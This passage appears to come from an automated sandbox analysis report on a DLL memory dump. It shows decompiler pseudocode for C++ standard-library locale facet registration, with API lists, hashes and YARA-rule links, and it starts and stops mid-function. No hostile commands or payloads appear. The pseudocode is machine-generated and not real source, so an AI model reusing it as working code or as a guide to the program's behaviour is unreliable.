							_t636 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t236);
							__eflags = _t636;
							if(_t636 != 0) {
								L12:
								E6D4866BA(_t682 - 0x14);
								return E6D4A0075(_t636);
							} else {
								__eflags = _t652;
								if(_t652 == 0) {
									_push( *((intOrPtr*)(_t682 + 8)));
									_push(_t682 - 0x10);
									__eflags = E6D491057(_t482, _t492, __edx, _t636, _t652) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t682 - 0x20);
										E6D4A3D74(_t682 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t482, _t636, _t652, 0x14);
										E6D486653(_t682 - 0x14, 0);
										_t653 =  *0x6d546dc0; // 0x0
										 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
										 *(_t682 - 0x10) = _t653;
										_t249 = E6D46161C(0x6d546d74);
										_t499 =  *((intOrPtr*)(_t682 + 8));
										_t637 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t249);
										__eflags = _t637;
										if(_t637 != 0) {
											L19:
											E6D4866BA(_t682 - 0x14);
											return E6D4A0075(_t637);
										} else {
											__eflags = _t653;
											if(_t653 == 0) {
												_push( *((intOrPtr*)(_t682 + 8)));
												_push(_t682 - 0x10);
												__eflags = E6D4910BF(_t482, _t499, __edx, _t637, _t653) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t682 - 0x20);
													E6D4A3D74(_t682 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t482, _t637, _t653, 0x14);
													E6D486653(_t682 - 0x14, 0);
													_t654 =  *0x6d546df8; // 0x0
													 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
													 *(_t682 - 0x10) = _t654;
													_t262 = E6D46161C(0x6d546da4);
													_t506 =  *((intOrPtr*)(_t682 + 8));
													_t638 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t262);
													__eflags = _t638;
													if(_t638 != 0) {
														L26:
														E6D4866BA(_t682 - 0x14);
														return E6D4A0075(_t638);
													} else {
														__eflags = _t654;
														if(_t654 == 0) {
															_push( *((intOrPtr*)(_t682 + 8)));
															_push(_t682 - 0x10);
															__eflags = E6D491127(_t482, _t506, _t633, _t638, _t654) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t682 - 0x20);
																E6D4A3D74(_t682 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t482, _t638, _t654, 0x14);
																E6D486653(_t682 - 0x14, 0);
																_t655 =  *0x6d546df4; // 0x0
																 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																 *(_t682 - 0x10) = _t655;
																_t275 = E6D46161C(0x6d546da0);
																_t513 =  *((intOrPtr*)(_t682 + 8));
																_t639 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t275);
																__eflags = _t639;
																if(_t639 != 0) {
																	L33:
																	E6D4866BA(_t682 - 0x14);
																	return E6D4A0075(_t639);
																} else {
																	__eflags = _t655;
																	if(_t655 == 0) {
																		_push( *((intOrPtr*)(_t682 + 8)));
																		_push(_t682 - 0x10);
																		__eflags = E6D4911AB(_t482, _t513, _t633, _t639, _t655) - 0xffffffff;
																		if(__eflags == 0) {
																			E6D461438(_t682 - 0x20);
																			E6D4A3D74(_t682 - 0x20, 0x6d543504);
																			asm("int3");
																			E6D4A00AC(0x6d4e83cf, _t482, _t639, _t655, 0x14);
																			E6D486653(_t682 - 0x14, 0);
																			_t656 =  *0x6d546dc8; // 0x0
																			 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																			 *(_t682 - 0x10) = _t656;
																			_t288 = E6D46161C(0x6d546d7c);
																			_t520 =  *((intOrPtr*)(_t682 + 8));
																			_t640 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t288);
																			__eflags = _t640;
																			if(_t640 != 0) {
																				L40:
																				E6D4866BA(_t682 - 0x14);
																				return E6D4A0075(_t640);
																			} else {
																				__eflags = _t656;
																				if(_t656 == 0) {
																					_push( *((intOrPtr*)(_t682 + 8)));
																					_push(_t682 - 0x10);
																					__eflags = E6D491230(_t482, _t520, _t633, _t640, _t656) - 0xffffffff;
																					if(__eflags == 0) {
																						E6D461438(_t682 - 0x20);
																						E6D4A3D74(_t682 - 0x20, 0x6d543504);
																						asm("int3");
																						E6D4A00AC(0x6d4e83cf, _t482, _t640, _t656, 0x14);
																						E6D486653(_t682 - 0x14, 0);
																						_t657 =  *0x6d546dc4; // 0x0
																						 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																						 *(_t682 - 0x10) = _t657;
																						_t301 = E6D46161C(0x6d546d78);
																						_t527 =  *((intOrPtr*)(_t682 + 8));
																						_t641 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t301);
																						__eflags = _t641;
																						if(_t641 != 0) {
																							L47:
																							E6D4866BA(_t682 - 0x14);
																							return E6D4A0075(_t641);
																						} else {
																							__eflags = _t657;
																							if(_t657 == 0) {
																								_push( *((intOrPtr*)(_t682 + 8)));
																								_push(_t682 - 0x10);
																								__eflags = E6D4912B4(_t482, _t527, _t633, _t641, _t657) - 0xffffffff;
																								if(__eflags == 0) {
																									E6D461438(_t682 - 0x20);
																									E6D4A3D74(_t682 - 0x20, 0x6d543504);
																									asm("int3");
																									E6D4A00AC(0x6d4e83cf, _t482, _t641, _t657, 0x14);
																									E6D486653(_t682 - 0x14, 0);
																									_t658 =  *0x6d546dd8; // 0x0
																									 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																									 *(_t682 - 0x10) = _t658;
																									_t314 = E6D46161C(0x6d546d84);
																									_t534 =  *((intOrPtr*)(_t682 + 8));
																									_t642 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t314);
																									__eflags = _t642;
																									if(_t642 != 0) {
																										L54:
																										E6D4866BA(_t682 - 0x14);
																										return E6D4A0075(_t642);
																									} else {
																										__eflags = _t658;
																										if(_t658 == 0) {
																											_push( *((intOrPtr*)(_t682 + 8)));
																											_push(_t682 - 0x10);
																											__eflags = E6D491339(_t482, _t534, _t633, _t642, _t658) - 0xffffffff;
																											if(__eflags == 0) {
																												E6D461438(_t682 - 0x20);
																												E6D4A3D74(_t682 - 0x20, 0x6d543504);
																												asm("int3");
																												E6D4A00AC(0x6d4e83cf, _t482, _t642, _t658, 0x14);
																												E6D486653(_t682 - 0x14, 0);
																												_t659 =  *0x6d546db0; // 0x0
																												 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																												 *(_t682 - 0x10) = _t659;
																												_t327 = E6D46161C(0x6d546d64);
																												_t541 =  *((intOrPtr*)(_t682 + 8));
																												_t643 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t327);
																												__eflags = _t643;
																												if(_t643 != 0) {
																													L61:
																													E6D4866BA(_t682 - 0x14);
																													return E6D4A0075(_t643);
																												} else {
																													__eflags = _t659;
																													if(_t659 == 0) {
																														_push( *((intOrPtr*)(_t682 + 8)));
																														_push(_t682 - 0x10);
																														__eflags = E6D4913A1(_t482, _t541, _t633, _t643, _t659) - 0xffffffff;
																														if(__eflags == 0) {
																															E6D461438(_t682 - 0x20);
																															E6D4A3D74(_t682 - 0x20, 0x6d543504);
																															asm("int3");
																															E6D4A00AC(0x6d4e83cf, _t482, _t643, _t659, 0x14);
																															E6D486653(_t682 - 0x14, 0);
																															_t660 =  *0x6d546ddc; // 0x0
																															 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																															 *(_t682 - 0x10) = _t660;
																															_t340 = E6D46161C(0x6d546d88);
																															_t548 =  *((intOrPtr*)(_t682 + 8));
																															_t644 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t340);
																															__eflags = _t644;
																															if(_t644 != 0) {
																																L68:
																																E6D4866BA(_t682 - 0x14);
																																return E6D4A0075(_t644);
																															} else {
																																__eflags = _t660;
																																if(_t660 == 0) {
																																	_push( *((intOrPtr*)(_t682 + 8)));
																																	_push(_t682 - 0x10);
																																	__eflags = E6D491409(_t482, _t548, _t633, _t644, _t660) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6D461438(_t682 - 0x20);
																																		E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																		asm("int3");
																																		E6D4A00AC(0x6d4e83cf, _t482, _t644, _t660, 0x14);
																																		E6D486653(_t682 - 0x14, 0);
																																		_t661 =  *0x6d546de0; // 0x0
																																		 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																		 *(_t682 - 0x10) = _t661;
																																		_t353 = E6D46161C(0x6d546d8c);
																																		_t555 =  *((intOrPtr*)(_t682 + 8));
																																		_t645 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t353);
																																		__eflags = _t645;
																																		if(_t645 != 0) {
																																			L75:
																																			E6D4866BA(_t682 - 0x14);
																																			return E6D4A0075(_t645);
																																		} else {
																																			__eflags = _t661;
																																			if(_t661 == 0) {
																																				_push( *((intOrPtr*)(_t682 + 8)));
																																				_push(_t682 - 0x10);
																																				__eflags = E6D491471(_t482, _t555, _t633, _t645, _t661) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6D461438(_t682 - 0x20);
																																					E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																					asm("int3");
																																					E6D4A00AC(0x6d4e83cf, _t482, _t645, _t661, 0x14);
																																					E6D486653(_t682 - 0x14, 0);
																																					_t662 =  *0x6d546dfc; // 0x0
																																					 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																					 *(_t682 - 0x10) = _t662;
																																					_t366 = E6D46161C(0x6d546da8);
																																					_t562 =  *((intOrPtr*)(_t682 + 8));
																																					_t646 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t366);
																																					__eflags = _t646;
																																					if(_t646 != 0) {
																																						L82:
																																						E6D4866BA(_t682 - 0x14);
																																						return E6D4A0075(_t646);
																																					} else {
																																						__eflags = _t662;
																																						if(_t662 == 0) {
																																							_push( *((intOrPtr*)(_t682 + 8)));
																																							_push(_t682 - 0x10);
																																							__eflags = E6D4914EC(_t482, _t562, _t633, _t646, _t662) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6D461438(_t682 - 0x20);
																																								E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																								asm("int3");
																																								E6D4A00AC(0x6d4e83cf, _t482, _t646, _t662, 0x14);
																																								E6D486653(_t682 - 0x14, 0);
																																								_t663 =  *0x6d546dcc; // 0x0
																																								 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																								 *(_t682 - 0x10) = _t663;
																																								_t379 = E6D46161C(0x6d546d80);
																																								_t569 =  *((intOrPtr*)(_t682 + 8));
																																								_t647 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t379);
																																								__eflags = _t647;
																																								if(_t647 != 0) {
																																									L89:
																																									E6D4866BA(_t682 - 0x14);
																																									return E6D4A0075(_t647);
																																								} else {
																																									__eflags = _t663;
																																									if(_t663 == 0) {
																																										_push( *((intOrPtr*)(_t682 + 8)));
																																										_push(_t682 - 0x10);
																																										__eflags = E6D491558(_t482, _t569, _t633, _t647, _t663) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6D461438(_t682 - 0x20);
																																											E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																											asm("int3");
																																											E6D4A00AC(0x6d4e83cf, _t482, _t647, _t663, 0x14);
																																											E6D486653(_t682 - 0x14, 0);
																																											_t664 =  *0x6d546e00; // 0x0
																																											 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																											 *(_t682 - 0x10) = _t664;
																																											_t392 = E6D46161C(0x6d546dac);
																																											_t576 =  *((intOrPtr*)(_t682 + 8));
																																											_t648 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t392);
																																											__eflags = _t648;
																																											if(_t648 != 0) {
																																												L96:
																																												E6D4866BA(_t682 - 0x14);
																																												return E6D4A0075(_t648);
																																											} else {
																																												__eflags = _t664;
																																												if(_t664 == 0) {
																																													_push( *((intOrPtr*)(_t682 + 8)));
																																													_push(_t682 - 0x10);
																																													__eflags = E6D4915C4(_t482, _t576, _t633, _t648, _t664) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6D461438(_t682 - 0x20);
																																														E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																														asm("int3");
																																														E6D4A00AC(0x6d4e83cf, _t482, _t648, _t664, 0x14);
																																														E6D486653(_t682 - 0x14, 0);
																																														_t665 =  *0x6d546dd0; // 0x0
																																														 *(_t682 - 4) =  *(_t682 - 4) & 0x00000000;
																																														 *(_t682 - 0x10) = _t665;
																																														_t405 = E6D46161C(0x6d546d60);
																																														_t583 =  *((intOrPtr*)(_t682 + 8));
																																														_t649 = E6D46171B( *((intOrPtr*)(_t682 + 8)), _t405);
																																														__eflags = _t649;
																																														if(_t649 != 0) {
																																															L103:
																																															E6D4866BA(_t682 - 0x14);
																																															return E6D4A0075(_t649);
																																														} else {
																																															__eflags = _t665;
																																															if(_t665 == 0) {
																																																_push( *((intOrPtr*)(_t682 + 8)));
																																																_push(_t682 - 0x10);
																																																__eflags = E6D49162A(_t482, _t583, _t633, _t649, _t665) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	_t587 = _t682 - 0x20;
																																																	E6D461438(_t587);
																																																	E6D4A3D74(_t682 - 0x20, 0x6d543504);
																																																	asm("int3");
																																																	E6D4A00AC(0x6d4e851f, _t482, _t649, _t665, 4);
																																																	_t666 = _t587;
																																																	 *(_t682 - 0x10) = _t666;
																																																	 *((intOrPtr*)(_t666 + 4)) =  *((intOrPtr*)(_t682 + 0xc));
																																																	_push( *((intOrPtr*)(_t682 + 0x14)));
																																																	_t217 = _t682 - 4;
																																																	 *_t217 =  *(_t682 - 4) & 0x00000000;
																																																	__eflags =  *_t217;
																																																	 *_t666 = 0x6d4ec0c4;
																																																	 *((char*)(_t666 + 0x28)) =  *((intOrPtr*)(_t682 + 0x10));
																																																	E6D49542F(_t482, _t587, _t633, _t649, _t666,  *_t217);
																																																	return E6D4A0075(_t666,  *((intOrPtr*)(_t682 + 8)));
																																																} else {
																																																	_t649 =  *(_t682 - 0x10);
																																																	 *(_t682 - 0x10) = _t649;
																																																	 *(_t682 - 4) = 1;
																																																	E6D486FD3(__eflags, _t649);
																																																	 *0x6d4ea26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t649 + 4))))();
																																																	 *0x6d546dd0 = _t649;
																																																	goto L103;
																																																}
																																															} else {
																																																_t649 = _t665;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t648 =  *(_t682 - 0x10);
																																														 *(_t682 - 0x10) = _t648;
																																														 *(_t682 - 4) = 1;
																																														E6D486FD3(__eflags, _t648);
																																														 *0x6d4ea26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t648 + 4))))();
																																														 *0x6d546e00 = _t648;
																																														goto L96;
																																													}
																																												} else {
																																													_t648 = _t664;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t647 =  *(_t682 - 0x10);
																																											 *(_t682 - 0x10) = _t647;
																																											 *(_t682 - 4) = 1;
																																											E6D486FD3(__eflags, _t647);
																																											 *0x6d4ea26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t647 + 4))))();
																																											 *0x6d546dcc = _t647;
																																											goto L89;
																																										}
																																									} else {
																																										_t647 = _t663;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t646 =  *(_t682 - 0x10);
																																								 *(_t682 - 0x10) = _t646;
																																								 *(_t682 - 4) = 1;
																																								E6D486FD3(__eflags, _t646);
																																								 *0x6d4ea26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t646 + 4))))();
																																								 *0x6d546dfc = _t646;
																																								goto L82;
																																							}
																																						} else {
																																							_t646 = _t662;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t645 =  *(_t682 - 0x10);
																																					 *(_t682 - 0x10) = _t645;
																																					 *(_t682 - 4) = 1;
																																					E6D486FD3(__eflags, _t645);
																																					 *0x6d4ea26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t645 + 4))))();
																																					 *0x6d546de0 = _t645;
																																					goto L75;
																																				}
																																			} else {
																																				_t645 = _t661;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t644 =  *(_t682 - 0x10);
																																		 *(_t682 - 0x10) = _t644;
																																		 *(_t682 - 4) = 1;
																																		E6D486FD3(__eflags, _t644);
																																		 *0x6d4ea26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t644 + 4))))();
																																		 *0x6d546ddc = _t644;
																																		goto L68;
																																	}
																																} else {
																																	_t644 = _t660;
																																	goto L68;
																																}
																															}
																														} else {
																															_t643 =  *(_t682 - 0x10);
																															 *(_t682 - 0x10) = _t643;
																															 *(_t682 - 4) = 1;
																															E6D486FD3(__eflags, _t643);
																															 *0x6d4ea26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t643 + 4))))();
																															 *0x6d546db0 = _t643;
																															goto L61;
																														}
																													} else {
																														_t643 = _t659;
																														goto L61;
																													}
																												}
																											} else {
																												_t642 =  *(_t682 - 0x10);
																												 *(_t682 - 0x10) = _t642;
																												 *(_t682 - 4) = 1;
																												E6D486FD3(__eflags, _t642);
																												 *0x6d4ea26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t642 + 4))))();
																												 *0x6d546dd8 = _t642;
																												goto L54;
																											}
																										} else {
																											_t642 = _t658;
																											goto L54;
																										}
																									}
																								} else {
																									_t641 =  *(_t682 - 0x10);
																									 *(_t682 - 0x10) = _t641;
																									 *(_t682 - 4) = 1;
																									E6D486FD3(__eflags, _t641);
																									 *0x6d4ea26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t641 + 4))))();
																									 *0x6d546dc4 = _t641;
																									goto L47;
																								}
																							} else {
																								_t641 = _t657;
																								goto L47;
																							}
																						}
																					} else {
																						_t640 =  *(_t682 - 0x10);
																						 *(_t682 - 0x10) = _t640;
																						 *(_t682 - 4) = 1;
																						E6D486FD3(__eflags, _t640);
																						 *0x6d4ea26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t640 + 4))))();
																						 *0x6d546dc8 = _t640;
																						goto L40;
																					}
																				} else {
																					_t640 = _t656;
																					goto L40;
																				}
																			}
																		} else {
																			_t639 =  *(_t682 - 0x10);
																			 *(_t682 - 0x10) = _t639;
																			 *(_t682 - 4) = 1;
																			E6D486FD3(__eflags, _t639);
																			 *0x6d4ea26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t639 + 4))))();
																			 *0x6d546df4 = _t639;
																			goto L33;
																		}
																	} else {
																		_t639 = _t655;
																		goto L33;
																	}
																}
															} else {
																_t638 =  *(_t682 - 0x10);
																 *(_t682 - 0x10) = _t638;
																 *(_t682 - 4) = 1;
																E6D486FD3(__eflags, _t638);
																 *0x6d4ea26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t638 + 4))))();
																 *0x6d546df8 = _t638;
																goto L26;
															}
														} else {
															_t638 = _t654;
															goto L26;
														}
													}
												} else {
													_t637 =  *(_t682 - 0x10);
													 *(_t682 - 0x10) = _t637;
													 *(_t682 - 4) = 1;
													E6D486FD3(__eflags, _t637);
													 *0x6d4ea26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t637 + 4))))();
													 *0x6d546dc0 = _t637;
													goto L19;
												}
											} else {
												_t637 = _t653;
												goto L19;
											}
										}
									} else {
										_t636 =  *(_t682 - 0x10);
										 *(_t682 - 0x10) = _t636;
										 *(_t682 - 4) = 1;
										E6D486FD3(__eflags, _t636);
										 *0x6d4ea26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t636 + 4))))();
										 *0x6d546df0 = _t636;
										goto L12;
									}
								} else {
									_t636 = _t652;
									goto L12;
								}
							}
						} else {
							_t635 =  *(_t682 - 0x10);
							 *(_t682 - 0x10) = _t635;
							 *(_t682 - 4) = 1;
							E6D486FD3(__eflags, _t635);
							 *0x6d4ea26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t635 + 4))))();
							 *0x6d546dbc = _t635;
							goto L5;
						}
					} else {
						_t635 = _t651;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6D48F37C
std::_Lockit::_Lockit.LIBCPMT ref: 6D48F386
int.LIBCPMT ref: 6D48F39D

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D48F3D7
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48F3F7
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48F415

Strings

pmTm, xrefs: 6D48F391

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: pmTm
API String ID: 651022567-3886064198
Opcode ID: c18b2909933ff0349ab3223f1cfedafdcbe7ff750e09472b34444943effe59cf
Instruction ID: 379c99acbe6e87ed7c5758b006a77a504d383cd1513084b044e9bbc60a9aa6ba
Opcode Fuzzy Hash: c18b2909933ff0349ab3223f1cfedafdcbe7ff750e09472b34444943effe59cf
Instruction Fuzzy Hash: E011E0768081199BCF01EBA0C844EEDB774AF94314F2A400DD611BB396CB70DE018BE2

Uniqueness

Uniqueness Score: -1.00%

Function 6D484A80, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6D484A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6D4A00AC(0x6d4e8144, __ebx, __edi, __esi, 0x14);
				E6D486653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6d55ce80; // 0x4e2410
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6D46161C(0x6d546b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6D46171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6D4866BA(_t61 - 0x14);
					return E6D4A0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10);
						__eflags = E6D4618A0(__ebx, _t47, __edx, _t57, _t59) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t61 - 0x20);
							E6D4A3D74(_t61 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e8192, __ebx, _t57, _t59, 0xc);
							_t60 = E6D484A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6D485BFB();
							return E6D4A0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6D486FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6d55ce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6d484a80
0x6d484a87
0x6d484a91
0x6d484a96
0x6d484a9f
0x6d484aa5
0x6d484aa8
0x6d484aad
0x6d484ab1
0x6d484ab6
0x6d484aba
0x6d484af5
0x6d484af8
0x6d484b04
0x6d484abc
0x6d484abe
0x6d484ac4
0x6d484aca
0x6d484ad2
0x6d484ad5
0x6d484b08
0x6d484b16
0x6d484b1b
0x6d484b23
0x6d484b2f
0x6d484b35
0x6d484b38
0x6d484b3b
0x6d484b3d
0x6d484b40
0x6d484b42
0x6d484b4a
0x6d484b53
0x6d484ad7
0x6d484ad7
0x6d484ada
0x6d484ade
0x6d484ae2
0x6d484aec
0x6d484aef
0x00000000
0x6d484aef
0x6d484ac0
0x6d484ac0
0x00000000
0x6d484ac0
0x6d484abe

APIs

__EH_prolog3.LIBCMT ref: 6D484A87
std::_Lockit::_Lockit.LIBCPMT ref: 6D484A91
int.LIBCPMT ref: 6D484AA8

Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

std::_Facet_Register.LIBCPMT ref: 6D484AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D484AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D484B16

Strings

4kTm, xrefs: 6D484A9A

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4kTm
API String ID: 651022567-4149940638
Opcode ID: f716dba579ced3dcc3e4b077fe8b299ce626bacf050cb56ec346ae5620604cec
Instruction ID: af64af569437a00ebf0525cdbda25670ab5cec7f7a9b114f74401bd19d1a3625
Opcode Fuzzy Hash: f716dba579ced3dcc3e4b077fe8b299ce626bacf050cb56ec346ae5620604cec
Instruction Fuzzy Hash: 0911CE718081699BCF02DBA4C844EEDB775AF54394F2A410CE615AB291DB71DE00C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CE506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D4CE506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t360 = E6D4CF26D(__ecx, 0x6a6);
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6d4cda4e
					_t243 = _t4;
